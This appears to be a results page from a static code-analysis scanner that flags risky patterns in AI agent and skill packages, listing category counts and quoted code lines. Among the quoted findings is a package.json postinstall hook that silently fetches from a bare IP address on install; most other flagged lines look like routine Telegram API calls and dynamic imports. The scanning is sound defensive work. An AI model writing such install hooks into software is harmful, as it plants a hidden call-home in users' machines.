Code analysis
static source read inferred
Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.
50066 analyzed
8097 re-analysis due
988 not analyzable
0 not yet analyzed
4803 source gone
not analyzable
789 too large 199 no source
Running analyzer v33. The scanner changelog explains what each version detects and when it changed.
- hidden prompt 338
- committed secret 6178
- dynamic exec 11834
- obfuscation 3579
- suspicious endpoint 12346
- credential in log 713
- over-broad oauth scope 2550
- suspicious skill script 185
- bundled IDE extension 49
- skill file 187628
- MEDIUM suspicious endpoint 1420079678-ctrl/agent-body 194.1.2.3
scripts: { postinstall: 'node -e "fetch(\'http://194.1.2.3/x\')"' }, - HIGH dynamic exec 1420079678-ctrl/agent-body new Function()
const value = new Function(`return (${literal})`)() - MEDIUM over-broad oauth scope lightbulb-mcp gmail.modify
capability_ref='gmail.modify', - MEDIUM suspicious endpoint Fei2-Labs/Kompany api.telegram.org
url="https://api.telegram.org/botxxx/getMe", - HIGH dynamic exec Fei2-Labs/Kompany __import__()
eng.autonomy = __import__( - HIGH dynamic exec Fei2-Labs/Kompany __import__()
lambda **_: __import__( - MEDIUM suspicious endpoint Fei2-Labs/Kompany 1.1.1.1
assert check_url("https://1.1.1.1/", resolver=_resolver({})) == "https://1.1.1.1/" - HIGH dynamic exec Fei2-Labs/Kompany __import__()
eng.autonomy = __import__( - HIGH dynamic exec Fei2-Labs/Kompany __import__()
engine.autonomy = __import__( - HIGH dynamic exec Fei2-Labs/Kompany __import__()
engine.autonomy = __import__( - HIGH dynamic exec Fei2-Labs/Kompany __import__()
engine._handle_operational = lambda d, c, ceo: __import__( - HIGH dynamic exec Fei2-Labs/Kompany __import__()
engine.autonomy = __import__( - MEDIUM suspicious endpoint Fei2-Labs/Kompany api.telegram.org
f"https://api.telegram.org/bot{self.bot_token}/sendMessage", - MEDIUM suspicious endpoint Fei2-Labs/Kompany api.telegram.org
f"https://api.telegram.org/bot{token}/getMe", - MEDIUM suspicious endpoint Fei2-Labs/Kompany api.telegram.org
f"https://api.telegram.org/bot{bot_token}/{method}",